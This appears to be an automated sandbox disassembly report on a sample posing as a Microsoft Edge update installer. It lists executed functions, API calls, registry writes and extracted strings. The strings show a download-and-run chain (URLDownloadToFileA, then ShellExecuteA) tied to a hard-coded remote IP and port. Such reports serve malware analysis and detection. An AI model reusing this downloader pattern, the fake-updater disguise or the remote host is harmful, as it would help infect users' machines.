15531->15530

                                        Executed Functions

                                        Function 00166690 Relevance: 28.4, APIs: 4, Strings: 12, Instructions: 401COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 19 166690-1666ea call 166aa0 24 1666ec-166745 19->24 25 16674a-166a98 URLDownloadToFileA * 2 ShellExecuteA exit 19->25 28 166a99-166a9c 24->28 25->28
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %s%s$%s%s%s$%s%s%s%s$.dll$.exe$154.82.68.34:16653$Error: 0xC0000005$RuntimeBrokers$\$common$http:\\$open
                                        • API String ID: 0-811608464
                                        • Opcode ID: 8b52b589f901a7444e005cb6d30c82d78929b658eb0c489b36c4a41871f8a696
                                        • Instruction ID: 2b45fdba91ccfc5b4503723d9d26546d150441e437ab908e4bf13240f4301838
                                        • Opcode Fuzzy Hash: 8b52b589f901a7444e005cb6d30c82d78929b658eb0c489b36c4a41871f8a696
                                        • Instruction Fuzzy Hash: 0CD1DF61D083D8D9EB12C7E8C858BDEBFB55F16304F0841C9D1897A282C7BA1748CB76
                                        Function 00163109 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 188registrylibraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,SetDefaultDllDirectories), ref: 00163129
                                        • GetProcAddress.KERNEL32(00000000), ref: 00163130
                                          • Part of subcall function 0016187B: GetCommandLineW.KERNEL32(?), ref: 00161897
                                          • Part of subcall function 0016187B: CommandLineToArgvW.SHELL32(00000000), ref: 0016189E
                                          • Part of subcall function 0016187B: LocalFree.KERNEL32(?), ref: 00161919
                                        • CoInitializeEx.COMBASE(00000000,00000006,00000000,00000000,?,80040751,?,?,00000000), ref: 00163274
                                          • Part of subcall function 00162EA5: RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\EdgeUpdate,00000000,00000000,00000000,00000003,00000000,?,00000000), ref: 00162ECD
                                          • Part of subcall function 00162EA5: RegQueryValueExA.ADVAPI32(?,WindowsUpdateAttempts,00000000,?,?,?), ref: 00162EF5
                                          • Part of subcall function 00162EA5: RegSetValueExA.ADVAPI32(?,WindowsUpdateAttempts,00000000,00000004,?,00000004), ref: 00162F25
                                          • Part of subcall function 00162EA5: RegCloseKey.ADVAPI32(?), ref: 00162F2E
                                          • Part of subcall function 00162F46: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00162F80
                                          • Part of subcall function 00162F46: RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\EdgeUpdate,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,?), ref: 00162FFE
                                          • Part of subcall function 00162F46: RegSetValueExW.ADVAPI32(?,WindowsUpdateVersion,00000000,00000001,?,00000007,?,?), ref: 00163022
                                          • Part of subcall function 00162F46: RegCloseKey.ADVAPI32(?,?,?), ref: 0016302E
                                          • Part of subcall function 00161A73: FindResourceW.KERNELBASE(00000000,00000066,0018272C), ref: 00161AED
                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\EdgeUpdate,00000000,00000002,80040751,?,?,?,?,?,00000000), ref: 001632F4
                                        • RegDeleteValueA.ADVAPI32(80040751,WindowsUpdateAttempts,?,?,?,?,?,00000000), ref: 00163306
                                        • RegCloseKey.ADVAPI32(80040751,?,?,?,?,?,00000000), ref: 0016330F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: Value$Close$CommandCreateLineModule$AddressArgvDeleteFileFindFreeHandleInitializeLocalNameOpenProcQueryResource
                                        • String ID: /%s$SOFTWARE\Microsoft\EdgeUpdate$SetDefaultDllDirectories$WUInstallTimeout$WUUpdateCheckTimeout$WindowsUpdateAttempts$async$asyncupdate$kernel32.dll
                                        • API String ID: 317954228-954644897
                                        • Opcode ID: c293a072f7cef83548644e4e06955ded0a528f6bd0114fdb7d3de1514465788d
                                        • Instruction ID: 6791e8c4455b7d9c27a1a1c8f97413e2a0ce1d611dfc5e3cc968749eacf05b83
                                        • Opcode Fuzzy Hash: c293a072f7cef83548644e4e06955ded0a528f6bd0114fdb7d3de1514465788d
                                        • Instruction Fuzzy Hash: A251D531E00148ABCB14FBF4DC66AEDBB75AF61350F184028F912AB295EF705B65CB90
                                        Function 0016207E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186filetimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,?,00000000,?,?), ref: 001620DC
                                        • GetSystemTimeAsFileTime.KERNEL32(001624AC,?,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 001621BF
                                        • DeleteFileW.KERNELBASE(?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 001622B8
                                        • FindNextFileW.KERNELBASE(00000000,00000400), ref: 001622C6
                                        • FindClose.KERNEL32(00000000), ref: 001622D5
                                          • Part of subcall function 00161FF9: GetFileAttributesExW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,00162412,00000000,?,?,00000000), ref: 00162026
                                          • Part of subcall function 00161FF9: GetLastError.KERNEL32(?,?,?,?,?,00162412,00000000,?,?,00000000,?,?,00000000,00000000), ref: 00162030
                                        • RemoveDirectoryW.KERNELBASE(?,00000000,?,?), ref: 00162308
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: File$Find$Time$AttributesCloseDeleteDirectoryErrorFirstLastNextRemoveSystem
                                        • String ID: \*.*
                                        • API String ID: 968363123-1173974218
                                        • Opcode ID: d7689c442403597d13d90a1e8ec7c6d733455cd968cd0358cd26dd46c29eeab5
                                        • Instruction ID: 970465584b1e372fb5435be1f4126d6c1513d2c55b579cc801d86864e18424f1
                                        • Opcode Fuzzy Hash: d7689c442403597d13d90a1e8ec7c6d733455cd968cd0358cd26dd46c29eeab5
                                        • Instruction Fuzzy Hash: C8718A70A046289BDF24AF24CC9DBAEB7B8EF89310F1041D9E859A3291CF305E94CF50
                                        Function 0016231F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143filetimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • FindFirstFileExW.KERNELBASE(?,00000000,?,00000001,00000000,00000000,?,?,?,00000000,?,?,00000000), ref: 00162385
                                        • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,00000000,?,?,00000000,00000000,?,?,?,00000000,?,?,00000000), ref: 00162424
                                        • FindNextFileW.KERNELBASE(00000000,?,00000000,?,?,?,00000000,?,?,00000000), ref: 001624B4
                                        • FindClose.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 001624C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: FileFind$Time$CloseFirstNextSystem
                                        • String ID: %s\%s$%s\%s*.*
                                        • API String ID: 242723571-286024918
                                        • Opcode ID: b5ec95b3ee3f66b80fc4ef5c1aa354e22da994d0e78c3089a0bf2954e6c55b00
                                        • Instruction ID: c091310c3c7a9fac244827bf44cdcf584dd98c218bff8d059a8b7a8030347ef8
                                        • Opcode Fuzzy Hash: b5ec95b3ee3f66b80fc4ef5c1aa354e22da994d0e78c3089a0bf2954e6c55b00
                                        • Instruction Fuzzy Hash: 0E516E71D01128AADF14EF64CC49AEEBBB8FF14310F104299F419A3191DF745B94CBA0
                                        Function 001627A1 Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 427 1627a1-1627d1 FindResourceW 428 162816 427->428 429 1627d3-1627df call 1643c1 427->429 431 162818-162826 call 168bf5 428->431 429->428 434 1627e1-1627ef SizeofResource call 162b7e 429->434 437 1627f4-1627f7 434->437 437->428 438 1627f9-162814 437->438 438->431
                                        APIs
                                        • FindResourceW.KERNEL32(00000000,00000066,00182730,00000000,?,?,?,?,001628AC,?,?,00000000), ref: 001627C4
                                          • Part of subcall function 001643C1: LoadResource.KERNEL32(?,?,001627DB,?,?,?,?,001628AC,?,?,00000000), ref: 001643C6
                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,001628AC,?,?,00000000), ref: 001627E4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadSizeof
                                        • String ID:
                                        • API String ID: 507330600-0
                                        • Opcode ID: 4b83b475cfd5d30fcc0e67721f83aea221f9df7206f49adf37d9b3326743f299
                                        • Instruction ID: 62bcc503e2a57ee46f7a00b77bd46b6ff2318dccab7153c496c4b159ee0ca841
                                        • Opcode Fuzzy Hash: 4b83b475cfd5d30fcc0e67721f83aea221f9df7206f49adf37d9b3326743f299
                                        • Instruction Fuzzy Hash: 4901DE71A00626AFEB10AF798C49EBF7BECEF58750B514069F805D7281EB308D418BA0
                                        Function 00166AA0 Relevance: 31.8, APIs: 1, Strings: 17, Instructions: 318libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 166aa0-166fe7 call 166ff0 call 167090 LoadLibraryA
                                        APIs
                                        • LoadLibraryA.KERNELBASE(urlmon), ref: 00166F20
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: GetLastInputInfo$GetProcAddress$GetTickCount$KERNELBASE$LoadLibraryA$MessageBoxA$SHGetFolderPathA$Shell32$ShellExecuteA$URLDownloadToFileA$exit$exit$msvcrt$shell32.dll$sprintf$urlmon$user32
                                        • API String ID: 1029625771-626952125
                                        • Opcode ID: c181c8c601dcd4bf893b6e0e3c121233109e1c3e0344c480134c42ffc4a53fb1
                                        • Instruction ID: 58da344dacb4f7dd93c003eaf13e72340bad5b43495232350a9fdcbef53aa8be
                                        • Opcode Fuzzy Hash: c181c8c601dcd4bf893b6e0e3c121233109e1c3e0344c480134c42ffc4a53fb1
                                        • Instruction Fuzzy Hash: 92129D209082D8DDEB12C768C8487DDBFB15F16748F0881C9D58C6B292C7BB5A99CB76
                                        Function 00161A73 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 231COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 116 161a73-161a99 call 16187b 119 161ac5-161ace call 1625d9 116->119 120 161a9b-161aa2 call 161f55 116->120 125 161ad0-161ad9 call 1626c9 119->125 126 161adf-161af9 FindResourceW 119->126 127 161bc3-161bc6 120->127 128 161aa8-161aaf call 161938 120->128 125->126 125->127 130 161b0a-161b18 126->130 131 161afb-161b08 call 165272 126->131 133 161d31-161d45 call 168bf5 127->133 128->119 141 161ab1-161abf call 1641bd 128->141 143 161b3a-161b45 call 162829 130->143 144 161b1a-161b1b call 1627a1 130->144 131->130 142 161b47-161b79 call 163b35 131->142 141->119 141->127 159 161b7e-161b8e call 16497a 142->159 143->127 143->142 152 161b20-161b22 144->152 153 161b36-161b38 152->153 154 161b24-161b34 152->154 153->142 153->143 154->143 162 161b90-161b95 159->162 163 161b9e 159->163 162->159 164 161b97-161b9c 162->164 165 161ba3-161bc1 call 164953 163->165 164->165 165->127 170 161bcb-161bce 165->170 171 161bd6-161bdf call 1628da 170->171 172 161bd0-161bd4 170->172 171->127 173 161be1-161bee 171->173 172->171 172->173 176 161bf4-161c49 call 163b35 call 1636e0 call 1636b4 call 169110 GetModuleFileNameW 173->176 177 161d2f 173->177 187 161c5c 176->187 188 161c4b-161c4d 176->188 177->133 189 161c5e-161c65 187->189 188->187 190 161c4f-161c5a call 161786 188->190 191 161c67-161c69 189->191 192 161cad-161cc7 call 161684 call 161d96 189->192 190->189 195 161c8a-161cab call 161684 191->195 196 161c6b-161c85 call 162dd7 call 161302 191->196 204 161ccc-161cd8 call 161e78 192->204 195->204 196->133 209 161cda-161cdc 204->209 210 161d08-161d1a call 164863 204->210 209->210 211 161cde-161d03 call 16362b call 161684 call 161302 209->211 216 161d23-161d2a call 161302 210->216 217 161d1c-161d22 call 1794f1 210->217 211->210 216->177 217->216
                                        APIs
                                          • Part of subcall function 0016187B: GetCommandLineW.KERNEL32(?), ref: 00161897
                                          • Part of subcall function 0016187B: CommandLineToArgvW.SHELL32(00000000), ref: 0016189E
                                          • Part of subcall function 0016187B: LocalFree.KERNEL32(?), ref: 00161919
                                        • FindResourceW.KERNELBASE(00000000,00000066,0018272C), ref: 00161AED
                                          • Part of subcall function 00161F55: SHGetKnownFolderPath.SHELL32(0018134C,00000000,00000000,?,?,?,00161AA0), ref: 00161F76
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00161C41
                                          • Part of subcall function 00161938: GetCommandLineW.KERNEL32(?,WUZP,00000000,brand=), ref: 0016197A
                                          • Part of subcall function 00161938: CommandLineToArgvW.SHELL32(00000000), ref: 00161981
                                          • Part of subcall function 00161938: LocalFree.KERNEL32(00000000), ref: 001619B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CommandLine$ArgvFreeLocal$FileFindFolderKnownModuleNamePathResource
                                        • String ID: "%s"$ %s$ /%s %s /%s$WUZDPBlocked$install$installsource$taggedmi
                                        • API String ID: 3280852399-1635896410
                                        • Opcode ID: 122310f5e1ed26abcdde695a81a5a8b95930ee8057aad2fb6e5951aabf09efd7
                                        • Instruction ID: 8063f89bcf57f4f015588d39a1c283739174be309567938ca5db68c03655c467
                                        • Opcode Fuzzy Hash: 122310f5e1ed26abcdde695a81a5a8b95930ee8057aad2fb6e5951aabf09efd7
                                        • Instruction Fuzzy Hash: 1671F2719043016BCB25EF64CC45B6EB7E8AFA1314F18052DF851972E2EB70DE68CB92
                                        Function 001625D9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • IsUserAnAdmin.SHELL32 ref: 001625EE
                                        • SHGetFolderPathW.SHELL32(00000000,00008026,00000000,00000000,00000000,00000104,00000000), ref: 00162628
                                        • CreateDirectoryW.KERNELBASE(?,00000000,Microsoft,?,000000FF), ref: 0016265D
                                        • GetLastError.KERNEL32 ref: 00162667
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AdminCreateDirectoryErrorFolderLastPathUser
                                        • String ID: Microsoft$Temp
                                        • API String ID: 943171645-1906582479
                                        • Opcode ID: 31671623f5b61c414ae7e2fab4074a8a7481d69fb0f1f510d387917955726ecd
                                        • Instruction ID: 48fce4d16f8dd82cf878f7145080ffb53bf2e3a0de101fb3754ffa3d9f90e2ba
                                        • Opcode Fuzzy Hash: 31671623f5b61c414ae7e2fab4074a8a7481d69fb0f1f510d387917955726ecd
                                        • Instruction Fuzzy Hash: DF217470900208BBCB14EBB5DC969EDB778EF24324F400169F822A3692DF709B69CB54
                                        Function 0016187B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 347 16187b-1618d7 GetCommandLineW CommandLineToArgvW call 16132b call 163afc call 161684 354 161916-161937 LocalFree call 161302 call 168bf5 347->354 355 1618d9-1618e8 347->355 360 16190a 355->360 361 1618ea-1618f2 355->361 363 16190d-161910 360->363 362 1618f4-161908 361->362 361->363 362->360 367 161914 362->367 363->355 365 161912 363->365 365->354 367->354
                                        APIs
                                        • GetCommandLineW.KERNEL32(?), ref: 00161897
                                        • CommandLineToArgvW.SHELL32(00000000), ref: 0016189E
                                        • LocalFree.KERNEL32(?), ref: 00161919
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CommandLine$ArgvFreeLocal
                                        • String ID: /%s$installsource$windowsupdate
                                        • API String ID: 1415666456-3821074820
                                        • Opcode ID: a4aee85db7fa6bc63df86d7669a9ff97d42083d9cfd7e2b132a62de35b76d726
                                        • Instruction ID: 9b8c8b8057d4f5c112582c88c8bc93a2b619d5bbd9ddb408b84b86055d283a76
                                        • Opcode Fuzzy Hash: a4aee85db7fa6bc63df86d7669a9ff97d42083d9cfd7e2b132a62de35b76d726
                                        • Instruction Fuzzy Hash: 49215971A00209BFCF10EFA4DC968AEBBB9FF54305B0544ADE056E7151DB30AA95DB50
                                        Function 001624FB Relevance: 7.6, APIs: 5, Instructions: 78fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,00000000,00000000,Temp), ref: 00162519
                                        • GetLastError.KERNEL32(?,00000000,00000000,Temp), ref: 00162523
                                        • GetTempFileNameW.KERNELBASE(?,00182BC0,00000000,00000000,00000104,00000000,?,?,?,00000000,00000000,Temp), ref: 0016257B
                                        • DeleteFileW.KERNELBASE(?,000000FF,?,?,?,00000000,00000000,Temp), ref: 00162599
                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00000000,00000000,Temp), ref: 001625A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryFile$DeleteErrorLastNameTemp
                                        • String ID:
                                        • API String ID: 55127950-0
                                        • Opcode ID: f3e757b4d4907c5c48a29303acc009ce7d70e47e1e3ab9a82a1eb6ec7c9a4ca3
                                        • Instruction ID: 17b15cae59fdb792ce4567f7a0e59a39c5088412537e1d0697e545a611578013
                                        • Opcode Fuzzy Hash: f3e757b4d4907c5c48a29303acc009ce7d70e47e1e3ab9a82a1eb6ec7c9a4ca3
                                        • Instruction Fuzzy Hash: 11217F71A00108BBDB14BFA8CC659EEBBB8EF24311B50016DF41693291DF305EA5CB94
                                        Function 001652E1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 395 1652e1-165313 RegOpenKeyExW 396 165315-165346 RegQueryValueExW RegCloseKey 395->396 397 16535f 395->397 396->397 399 165348-16534c 396->399 398 165362-165372 call 168bf5 397->398 399->397 401 16534e-165352 399->401 401->397 403 165354-16535d 401->403 403->398
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000001,?,00000000,WUZDPBlocked,?,SOFTWARE\Microsoft\EdgeUpdate,WUZDPBlocked,?,?,?,00161ABD), ref: 0016530B
                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,SOFTWARE\Microsoft\EdgeUpdate,WUZDPBlocked), ref: 00165333
                                        • RegCloseKey.KERNELBASE(?,?,SOFTWARE\Microsoft\EdgeUpdate,WUZDPBlocked), ref: 0016533E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: WUZDPBlocked
                                        • API String ID: 3677997916-3392519844
                                        • Opcode ID: 79491e15ca2fa608f5a51d57c3ab9d17dcb2e606f24035b09247475287123e53
                                        • Instruction ID: 6aa9b79907af6afb0c57a267749d39975a149d24bd291d0961b0b69b76eebee5
                                        • Opcode Fuzzy Hash: 79491e15ca2fa608f5a51d57c3ab9d17dcb2e606f24035b09247475287123e53
                                        • Instruction Fuzzy Hash: 2A113DB5A0021CEFDB10DF94CD449EFBBB9FB04758F14416AE506A3200D7709E58CBA1
                                        Function 00164202 Relevance: 4.6, APIs: 3, Instructions: 69synchronizationthreadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • CreateEventW.KERNEL32(?,00000001,00000000,?), ref: 0016427D
                                        • CreateMutexW.KERNELBASE(00000000,00000001,00000000,?,00000000,?,?,?,00163270,00000000,00000000,?,80040751,?,?,00000000), ref: 00164293
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00004340,?,00000000,?), ref: 001642AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: Create$EventMutexThread
                                        • String ID:
                                        • API String ID: 1681652342-0
                                        • Opcode ID: fc48c4d34baec87182497a2af3081603b08fcbe80ba12d356cb55fd5d072c970
                                        • Instruction ID: 5776b0a8618a45c49d3e37eaefbd785562eb71a2f1c9cd9e376153989371af90
                                        • Opcode Fuzzy Hash: fc48c4d34baec87182497a2af3081603b08fcbe80ba12d356cb55fd5d072c970
                                        • Instruction Fuzzy Hash: 00212A705043419FC720EF6AD84595BBBF8BF99710F008A1EF8A9D3651D770E658CBA2
                                        Function 001638B5 Relevance: 2.5, APIs: 2, Instructions: 43COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 441 1638b5-1638c2 442 1638c4-1638d9 MultiByteToWideChar 441->442 443 1638ff-163901 call 163746 441->443 442->443 444 1638db-1638fd call 1636e0 MultiByteToWideChar call 16397f 442->444 447 163906-16390c 443->447 444->447
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,?,00000000,00000001,?,00164C13,00000000,00000000,00000000,?,?), ref: 001638CE
                                        • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,-00000001,-00000001,?,00164C13,00000000,00000000,00000000,?,?,?), ref: 001638EF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
